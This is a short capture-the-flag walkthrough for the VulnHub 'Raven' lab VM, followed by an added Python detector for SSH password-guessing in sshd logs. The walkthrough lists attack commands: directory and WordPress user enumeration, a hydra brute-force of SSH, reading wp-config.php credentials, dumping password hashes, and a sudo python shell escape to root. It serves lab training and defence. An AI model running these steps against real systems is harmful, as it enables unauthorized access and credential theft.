vulnhub-raven
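Target VM download: https://download.vulnhub.com/raven/Raven.ova
Kali: NAT mode; the target VM is also in NAT mode
Discover the host
Scan ports
Visit the website and view the page source; service.html shows up there, and visiting it reveals flag1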
dirb http://192.168.11.128
WordPress is found
wpscan --url http://192.168.11.128/wordpress -e u
hydra -l michael -P rockyou.txt 192.168.11.128 ssh
ssh michael@192.168.11.128
cd /var/www/html/wordpress/
ls
cat wp-config.php
mysql -u root -p
show databases;
use wordpress;
show tables;
select * from wp_users;
MD5 decoding
exit
su steven
sudo python -c 'import pty;pty.spawn("/bin/bash")'
whoami
cd …/…/
cat flag2.txt
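
Added example (not part of the original walkthrough): the password-guessing step against SSH followed by a successful login leaves a recognizable pattern in the sshd log, and this sketch flags it. The log lines, the hostname, the PIDs and the source addresses are constructed sample data, and the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample sshd log lines (not from the original page); the
# source addresses, hostname and PIDs are made up for the example.
SAMPLE_LOG = """\
Aug 13 10:01:01 raven sshd[1201]: Failed password for michael from 192.168.11.129 port 40112 ssh2
Aug 13 10:01:02 raven sshd[1202]: Failed password for michael from 192.168.11.129 port 40114 ssh2
Aug 13 10:01:03 raven sshd[1203]: Failed password for michael from 192.168.11.129 port 40116 ssh2
Aug 13 10:01:04 raven sshd[1204]: Failed password for michael from 192.168.11.129 port 40118 ssh2
Aug 13 10:01:05 raven sshd[1205]: Accepted password for michael from 192.168.11.129 port 40120 ssh2
Aug 13 11:30:10 raven sshd[1300]: Failed password for steven from 192.168.11.1 port 51000 ssh2
Aug 13 11:30:20 raven sshd[1301]: Accepted password for steven from 192.168.11.1 port 51002 ssh2
"""

# Matches sshd password results, including the "invalid user" variant.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def find_guessed_logins(log_text, threshold=3):
    """Return (user, src, failures) for each accepted login preceded by at
    least `threshold` failed passwords for the same user and source."""
    failures = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["user"], m["src"])
        if m["result"] == "Failed":
            failures[key] += 1
            continue
        if failures[key] >= threshold:
            hits.append((m["user"], m["src"], failures[key]))
        failures[key] = 0  # a successful login resets the counter
    return hits

if __name__ == "__main__":
    for user, src, n in find_guessed_logins(SAMPLE_LOG):
        print(f"{user} from {src}: login accepted after {n} failed passwords")
```

A single mistyped password before a successful login (the steven lines in the sample) stays below the threshold and is not reported.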